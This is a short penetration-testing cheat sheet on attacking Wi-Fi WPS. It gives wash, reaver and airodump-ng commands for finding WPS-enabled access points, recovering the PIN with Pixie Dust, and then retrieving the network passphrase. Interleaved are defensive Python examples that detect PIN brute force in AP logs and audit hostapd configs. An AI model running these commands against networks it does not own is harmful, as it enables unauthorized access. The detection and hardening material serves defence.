WPS Vulnerabilities

All of these attacks require the AP to offer the WPS PIN method; push-button (PBC) mode alone is not enough.

Check if WPS is enabled on the target AP before proceeding.

Identify APs with WPS enabled
wash -i <iface_mon>

wash is part of the Reaver package.

Online PIN bruteforce

Guess the PIN by attempting WPS authentications against the live AP. Rate is limited by AP-side throttling and authentication lockout.
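The throttling and lockout mentioned above are also what a defender watches for: a live PIN guess leaves a stream of failed WPS registrations from one client MAC in the AP's log. The following is an added detection example, not part of this page or of Reaver. The log lines are constructed, and their format is loosely modelled on hostapd's WPS-FAIL event; treat the exact layout (the `peer=` field in particular) as an assumption and adjust the regex to what your AP or controller actually writes.

```python
"""Flag online WPS PIN guessing from AP log lines (added example).

The sample log is constructed. Line format is an assumption loosely based on
hostapd's WPS-FAIL event and must be adapted to your AP's real log output.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: ee:01 hammers the AP with failed PIN registrations,
# ee:02 fails twice five minutes apart (a mistyped PIN), ee:03 succeeds.
SAMPLE_LOG = """\
2024-03-01T10:00:01 wlan0: WPS-FAIL msg=8 config_error=18 peer=aa:bb:cc:dd:ee:01
2024-03-01T10:00:03 wlan0: WPS-FAIL msg=8 config_error=18 peer=aa:bb:cc:dd:ee:01
2024-03-01T10:00:05 wlan0: WPS-FAIL msg=8 config_error=18 peer=aa:bb:cc:dd:ee:01
2024-03-01T10:00:07 wlan0: WPS-FAIL msg=8 config_error=18 peer=aa:bb:cc:dd:ee:01
2024-03-01T10:00:09 wlan0: WPS-FAIL msg=8 config_error=18 peer=aa:bb:cc:dd:ee:01
2024-03-01T10:00:10 wlan0: WPS-FAIL msg=8 config_error=18 peer=aa:bb:cc:dd:ee:02
2024-03-01T10:00:11 wlan0: WPS-FAIL msg=8 config_error=18 peer=aa:bb:cc:dd:ee:01
2024-03-01T10:00:12 wlan0: WPS-SUCCESS peer=aa:bb:cc:dd:ee:03
2024-03-01T10:05:30 wlan0: WPS-FAIL msg=8 config_error=18 peer=aa:bb:cc:dd:ee:02
"""

# Assumed line layout: ISO timestamp, interface, WPS-FAIL fields, peer MAC.
FAIL_RE = re.compile(
    r"^(?P<ts>\S+) \S+: WPS-FAIL msg=(?P<msg>\d+) config_error=(?P<err>\d+) "
    r"peer=(?P<peer>[0-9a-f:]{17})$"
)


def parse_failures(log_text):
    """Yield (timestamp, peer_mac, wps_msg_number) for every WPS-FAIL line.

    Lines that do not match (successes, unrelated events) are skipped.
    """
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["peer"], int(m["msg"])


def detect_pin_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {peer_mac: time_of_first_alert} for peers that accumulate
    `threshold` failed WPS registrations inside any `window`-long interval.

    A sliding window is kept per peer: timestamps older than `window`
    relative to the newest failure are dropped, so a slow trickle of
    genuine mistakes does not trip the alert but a guessing loop does.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, peer, _msg in parse_failures(log_text):
        q = recent[peer]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and peer not in alerts:
            alerts[peer] = ts
    return alerts


if __name__ == "__main__":
    for peer, when in detect_pin_bruteforce(SAMPLE_LOG).items():
        print(f"possible WPS PIN brute force from {peer} at {when.isoformat()}")
```

On the constructed sample only aa:bb:cc:dd:ee:01 is reported (five failures within nine seconds); the two isolated failures from ee:02 fall outside the window and stay silent. Tune `threshold` and `window` to the AP's own lockout policy so the alert fires before, not after, the AP locks itself.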

reaver usage

"Pixie Dust" - Offline PIN recovery

Capture the WPS M1/M2/M3 exchange and recover the PIN offline; this is fast because the affected APs use predictable PIN generation algorithms.

Exploitation

See if WPS-PIN is being offered and unlocked.

Identify APs with WPS enabled
wash -i <iface_mon>

Attempt a Pixie test. If successful, the target's PIN will be recovered.

Run the Pixie Dust test and attempt to retrieve the AP's PIN
reaver -i <iface_mon> -b <BSSID> -c <CH> -K -vv

Use the recovered PIN to retrieve the PSK.

Retrieve PSK using WPS PIN
reaver -i <iface_mon> -b <BSSID> -c <CH> -p <RECOVERED_PIN> -vv

Weak/default PIN algorithms

Online PIN guessing. Some APs use algorithms that generate predictable PINs; generate the candidate PIN and try it.

Does not work if the PIN has been changed from its default.

Identify the AP model to determine whether it is one with a known weak PIN algorithm.

Check the Wireless Security Database to see if the AP is known to be vulnerable.

Identify APs with WPS enabled and enumerate AP model information
wash -i <iface_mon> -j

airodump-ng alternative for enumerating AP model information
airodump-ng --manufacturer --wps <iface_mon>
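The flip side of the weak/default PIN section is the AP owner's configuration: a default PIN that was never changed, and a WPS PIN method left enabled, is what makes the guessing work. The following is an added audit example, not part of this page, of Reaver or of hostapd. It parses hostapd's key=value configuration and checks the WPS-related keys wps_state, ap_pin and ap_setup_locked. The two configurations are constructed samples; 12345670 is the placeholder PIN from hostapd's example config, and the reading that ap_setup_locked=1 stops external registrars from using the AP PIN is my understanding of hostapd's behaviour, so verify it against the hostapd.conf documentation for your version.

```python
"""Audit a hostapd configuration for WPS PIN exposure (added example).

Not hostapd's own code. Both configs below are constructed samples.
"""

# Constructed: WPS enabled with the example-config placeholder PIN and no setup lock.
WEAK_CONF = """\
interface=wlan0
ssid=OfficeNet
wpa=2
wpa_passphrase=correct horse battery staple
eap_server=1
wps_state=2
ap_pin=12345670
"""

# Constructed: WPS disabled entirely, which removes the PIN method as a target.
HARDENED_CONF = """\
interface=wlan0
ssid=OfficeNet
wpa=2
wpa_passphrase=correct horse battery staple
wps_state=0
"""

SEVERITY_ORDER = {"none": 0, "info": 1, "high": 2}


def parse_hostapd_conf(text):
    """Return {key: value} from hostapd's key=value lines.

    Blank lines and '#' comments are ignored; a repeated key keeps the last
    value, matching the order in which hostapd reads the file.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def wps_findings(conf):
    """Return a list of (severity, message) findings about the WPS PIN method."""
    findings = []
    # wps_state=0 (or absent) means WPS is disabled: nothing to guess against.
    if conf.get("wps_state", "0") == "0":
        return findings
    findings.append(("info", "WPS enabled: wps_state=" + conf["wps_state"]))
    pin = conf.get("ap_pin")
    if pin is None:
        return findings
    if pin == "12345670":
        findings.append(("high", "ap_pin is the placeholder 12345670 from hostapd's example config; set a unique PIN or remove it"))
    # Assumption: ap_setup_locked=1 makes hostapd refuse external-registrar
    # use of the AP PIN, which is the path an online PIN guess takes.
    if conf.get("ap_setup_locked", "0") != "1":
        findings.append(("high", "ap_pin is set and ap_setup_locked is not 1: the AP PIN is usable by external registrars"))
    return findings


def audit(text):
    """Parse a hostapd config and return (worst_severity, findings)."""
    findings = wps_findings(parse_hostapd_conf(text))
    worst = max((sev for sev, _ in findings), key=SEVERITY_ORDER.get, default="none")
    return worst, findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        worst, findings = audit(text)
        print(f"{name}: worst={worst}")
        for sev, msg in findings:
            print(f"  [{sev}] {msg}")
```

The hardened sample produces no findings at all because wps_state=0 switches WPS off; where WPS must stay on for push-button onboarding, the audit still reports "info" and the two "high" findings disappear once ap_pin is replaced with a unique value (or dropped) and ap_setup_locked=1 is set.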